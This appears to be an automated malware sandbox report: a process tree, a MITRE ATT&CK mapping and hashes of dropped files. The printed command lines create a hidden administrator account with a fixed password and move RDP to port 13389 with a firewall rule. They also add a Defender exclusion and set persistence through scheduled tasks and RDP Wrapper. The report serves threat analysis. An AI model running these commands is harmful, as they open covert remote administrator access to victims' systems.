  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\kbSG.vbs" KcyhtbVgWp lFxfaamHbo "C:\Users\Admin\AppData\Roaming\oWIu.vbs" "C:\Users\Admin\AppData\Roaming\BHjbFmnD.bat" "C:\Users\Admin\AppData\Roaming\CoJ.dll"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1504
    - - C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe "C:\Users\Admin\AppData\Roaming\kbSG.vbs" KcyhtbVgWp lFxfaamHbo "C:\Users\Admin\AppData\Roaming\oWIu.vbs" "C:\Users\Admin\AppData\Roaming\BHjbFmnD.bat" "C:\Users\Admin\AppData\Roaming\CoJ.dll"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2808
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\CoJ.dll" /tn maBoeRRz
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4236
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\CoJ.dll" /tn maBoeRRz
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:4844
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\kbSG.vbs" KcyhtbVgWp lFxfaamHbo "C:\Users\Admin\AppData\Roaming\UyhbT.vbs" "{8FFFE58F-ECDD-4CA7-BC75-34C3908B7B90}" "C:\Users\Admin\AppData\Roaming\CoJ.dll"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2632
    - - C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe "C:\Users\Admin\AppData\Roaming\kbSG.vbs" KcyhtbVgWp lFxfaamHbo "C:\Users\Admin\AppData\Roaming\UyhbT.vbs" "{8FFFE58F-ECDD-4CA7-BC75-34C3908B7B90}" "C:\Users\Admin\AppData\Roaming\CoJ.dll"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1196
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\CoJ.dll" /tn WOcMeAsA
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1576
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\CoJ.dll" /tn WOcMeAsA
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3332
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\qGmbXLLUsL.bat KcyhtbVgWp lFxfaamHbo"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2740
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3888
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic group where sid="S-1-5-32-544" get name /value
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4088
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1536
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic group where sid="S-1-5-32-555" get name /value
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2324
    - - C:\Windows\SysWOW64\net.exe
        
        net user KcyhtbVgWp lFxfaamHbo /add
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:744
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user KcyhtbVgWp lFxfaamHbo /add
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5092
    - - C:\Windows\SysWOW64\net.exe
        
        net localgroup Administrators KcyhtbVgWp /add
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2232
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators KcyhtbVgWp /add
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3076
    - - C:\Windows\SysWOW64\net.exe
        
        net localgroup "Remote Desktop Users" KcyhtbVgWp /add
        5⤵
        Remote Service Session Hijacking: RDP Hijacking
        System Location Discovery: System Language Discovery
        
        PID:2356
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" KcyhtbVgWp /add
        6⤵
        Remote Service Session Hijacking: RDP Hijacking
        System Location Discovery: System Language Discovery
        
        PID:2444
    - - C:\Windows\SysWOW64\net.exe
        
        net accounts /maxpwage:unlimited
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1688
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:976
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v KcyhtbVgWp /t REG_DWORD /d "00000000" /f
        5⤵
        Hide Artifacts: Hidden Users
        System Location Discovery: System Language Discovery
        
        PID:4960
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4600
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:4896
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1756
    - - C:\Windows\SysWOW64\timeout.exe
        
        Timeout /t 15
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:4964
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Program Files\RDP Wrapper\autoupdate.bat"
      4⤵
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      PID:4800
    - - C:\Windows\SysWOW64\fsutil.exe
        
        fsutil dirty query C:
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3896
    - - C:\Windows\SysWOW64\sc.exe
        
        sc queryex "TermService"
        5⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3316
    - - C:\Windows\SysWOW64\find.exe
        
        find "STATE"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2772
    - - C:\Windows\SysWOW64\find.exe
        
        find /v "RUNNING"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3000
    - - C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4980
    - - C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
        5⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in System32 directory
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:3068
      - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4300
    - - C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4988
    - - C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1608
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c query session rdp-tcp
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2868
    - - C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
        5⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2040
      - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall delete rule name="Remote Desktop"
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2504
    - - C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
        5⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:4524
      - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2356
    - - C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4320
    - - C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2164
    - - C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1800
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:708
      - C:\Windows\SysWOW64\cscript.exe
        
        cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3504
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2908
      - C:\Windows\SysWOW64\reg.exe
        
        reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4508
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" /t REG_SZ /d "10.0.19041.1202" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3964
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /c:"[10.0.19041.1202]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3664
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1276
      - C:\Windows\SysWOW64\cscript.exe
        
        cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        6⤵
        Blocklisted process makes network request
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:4036
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c findstr /n "^" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4008
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /n "^" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:872
    - - C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -r
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3716
    - - C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
        5⤵
        
        PID:3696
    - - C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4372
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /c:"[10.0.19041.1202]" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4352
- C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com
  "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com" sferas
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4108
- - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com
    "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com"
    3⤵
    - Executes dropped EXE
    - Drops Chrome extension
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:832

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:4772

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4188

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:2972

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3076

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:960

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\oWIu.vbs" KcyhtbVgWp lFxfaamHbo "C:\Users\Admin\AppData\Roaming\BHjbFmnD.bat"
1⤵
- Checks computer location settings
PID:3384
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\BHjbFmnD.bat
  2⤵
  - Drops file in System32 directory
  PID:2384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
    3⤵
    PID:4308
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic group where sid="S-1-5-32-544" get name /value
      4⤵
      PID:4144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
    3⤵
    PID:2316
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic group where sid="S-1-5-32-555" get name /value
      4⤵
      PID:1452
- - C:\Windows\system32\net.exe
    net user KcyhtbVgWp lFxfaamHbo /add
    3⤵
    PID:244
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user KcyhtbVgWp lFxfaamHbo /add
      4⤵
      PID:1028
- - C:\Windows\system32\net.exe
    net localgroup Administrators KcyhtbVgWp /add
    3⤵
    PID:2676
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators KcyhtbVgWp /add
      4⤵
      PID:3676
- - C:\Windows\system32\net.exe
    net localgroup Remote Desktop Users KcyhtbVgWp /add
    3⤵
    PID:3596
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Remote Desktop Users KcyhtbVgWp /add
      4⤵
      PID:2340
- - C:\Windows\system32\net.exe
    net accounts /maxpwage:unlimited
    3⤵
    PID:5020
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 accounts /maxpwage:unlimited
      4⤵
      PID:1492
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v KcyhtbVgWp /t REG_DWORD /d "00000000" /f
    3⤵
    - Hide Artifacts: Hidden Users
    PID:1004
- - C:\Windows\system32\reg.exe
    reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
    3⤵
    PID:2996
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:4108
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3248
- - C:\Windows\system32\timeout.exe
    Timeout /t 15
    3⤵
    - Delays execution with timeout.exe
    PID:3720

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\UyhbT.vbs" KcyhtbVgWp lFxfaamHbo "{8FFFE58F-ECDD-4CA7-BC75-34C3908B7B90}"
1⤵
- Blocklisted process makes network request
PID:4180

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\oWIu.vbs" KcyhtbVgWp lFxfaamHbo "C:\Users\Admin\AppData\Roaming\BHjbFmnD.bat"
1⤵
- Checks computer location settings
PID:3824
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\BHjbFmnD.bat
  2⤵
  - Drops file in System32 directory
  PID:3148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
    3⤵
    PID:2184
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic group where sid="S-1-5-32-544" get name /value
      4⤵
      PID:216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
    3⤵
    PID:3832
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic group where sid="S-1-5-32-555" get name /value
      4⤵
      PID:4816
- - C:\Windows\system32\net.exe
    net user KcyhtbVgWp lFxfaamHbo /add
    3⤵
    PID:388
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user KcyhtbVgWp lFxfaamHbo /add
      4⤵
      PID:2832
- - C:\Windows\system32\net.exe
    net localgroup Administrators KcyhtbVgWp /add
    3⤵
    PID:2444
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators KcyhtbVgWp /add
      4⤵
      PID:1256
- - C:\Windows\system32\net.exe
    net localgroup Remote Desktop Users KcyhtbVgWp /add
    3⤵
    PID:5100
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Remote Desktop Users KcyhtbVgWp /add
      4⤵
      PID:4100
- - C:\Windows\system32\net.exe
    net accounts /maxpwage:unlimited
    3⤵
    PID:2272
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 accounts /maxpwage:unlimited
      4⤵
      PID:1828
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v KcyhtbVgWp /t REG_DWORD /d "00000000" /f
    3⤵
    - Hide Artifacts: Hidden Users
    PID:896
- - C:\Windows\system32\reg.exe
    reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
    3⤵
    PID:4372
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:4940
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1484
- - C:\Windows\system32\timeout.exe
    Timeout /t 15
    3⤵
    - Delays execution with timeout.exe
    PID:4052

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\UyhbT.vbs" KcyhtbVgWp lFxfaamHbo "{8FFFE58F-ECDD-4CA7-BC75-34C3908B7B90}"
1⤵
- Blocklisted process makes network request
PID:4508

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Deobfuscate/Decode Files or Information

T1140

Hide Artifacts

T1564

Hidden Users

T1564.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Password Policy Discovery

T1201

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\RDP Wrapper\RDPWInst.exe

Filesize
1.4MB

MD5
3288c284561055044c489567fd630ac2

SHA1
11ffeabbe42159e1365aa82463d8690c845ce7b7

SHA256
ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

SHA512
c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

Download Submit
C:\Program Files\RDP Wrapper\autoupdate.bat

Filesize
12KB

MD5
b365fde3be7855f4254d1e4bba45d260

SHA1
b56c6f0402b25c5d68e3a722144f5f4b5bb53d27

SHA256
2a175e17c98f9d5f436e23d1c9670f36e54cb82269bccddc87dcfbcfb04d1360

SHA512
d08e261c0f5c18041d005029cc6ed6119a8cc446607bb5f683a059d1a193d8e04d3e0b52c9f2ea871fcfa8e043c5c2886cfce5419eaf37c39003236f7a399026

Download Submit
C:\Program Files\RDP Wrapper\rdpwrap_new.ini

Filesize
181KB

MD5
12afc3fd401d3724956283c33eb796eb

SHA1
66b875153e6ee45c76ae374a95e2cec013ac94e8

SHA256
370681b06f7f69461f745e0ef232c7e69aa6b91a9322903ea1150ba8b2eca120

SHA512
d9957669907fb20b3a3c12770574bacc51de14de8bce426292a0c95131fb354ab369e12303c01b8d3dc394ac3e30371b2d2c3744840a86b296f8938f747cffa4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_49536AB5156BDD74EFF881D01C36A419

Filesize
471B

MD5
eb4b4f9fa16909112f5a8f9654620337

SHA1
0bae7b32d406005fd45bff16bc05e6b1cace5cc7

SHA256
c350c1fa26742f2393ee665608a905c6300ff39eb49bc11d1e0a33a5362bf59f

SHA512
4a35e295293c7389c2bd38b848078dae20ca48f98d8257021b240951ec16c978b8dd4ccdd69d304909a02d7b0062c8a7435e3ee1e8770ee5e11684331154ddf3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_49536AB5156BDD74EFF881D01C36A419

Filesize
412B

MD5
1208cf7a11e1400b4615d616c5d7a9a2

SHA1
365e30ece001bc82f7d382bdb231edd527248ade

SHA256
cf3db76abe4ae159532c8fa06f350c0f9d3482ba07715c633ce0912a105d6524

SHA512
4d4fcd3c9318530ea2660c2adadb2aac068fd733f98f9dcd34f876e00b41b4bbca2dad1c9ebb1a15ff4d2760da58f4a53f2dc78793aec70fdf1405309c96eda3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
38d446f32b30267d276d39de5c7e18fb

SHA1
963d19bd5879ddbc314fc27ab8b890f64d293ace

SHA256
2f19c0bdb8b575729982ac0d0bd4b3a1065c5e5720ac39b5590656fa187410dd

SHA512
a743e586ac48fcb160586f8e81c0d50c71df783e31a3b1adc2cb46adb1bcffdb599b9e29a0880e6086d7a6ba723faaf92624d7157c2a5766e33357a52cbca537

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9b80cd7a712469a4c45fec564313d9eb

SHA1
6125c01bc10d204ca36ad1110afe714678655f2d

SHA256
5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d

SHA512
ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\IZBf.exe

Filesize
112KB

MD5
17567f841e0839a64a23f57f10ecc464

SHA1
61d1bdb90dce2493c0d0c8c6fe826fdab2f14bb4

SHA256
09fd43e052a13d5624d70c32e921e93bf366682fe7f218c1ec015b892b7b13e5

SHA512
746f3f9d78e7bbafa0cadd8a7ed7b8f6a1fac639cc6488fe39f866ab7b34d93c5dda00a02528b3a1ae7b42ab52895740d3309a67898acd449be31121b17e192b

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\LXOi.exe

Filesize
393KB

MD5
4699072b245bd2c2a22b7d08aecdf82d

SHA1
08261c8982d46e39b59e685e47df442b42f97f10

SHA256
24b5befb7bb4b85ef61f8f86c878f508e5f1716f3de03abe183939c2dd115e8b

SHA512
a32ed45751392698d20434ab8f849819832e10cd859a929216f8516cd8933cf52813319a7eab703bc45736def5c67f5e974a07b02c7e459a11aadc915b5c336c

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\bruto

Filesize
542KB

MD5
05151f488f7e6ade25f0b1dc17c0291d

SHA1
aae7feac5765450eff7c5b1c0d5300c2e1ecef3a

SHA256
58ef678cd87678a30de6f8955886c4e92c73253d23e6b3d86ca3786d5fd712f5

SHA512
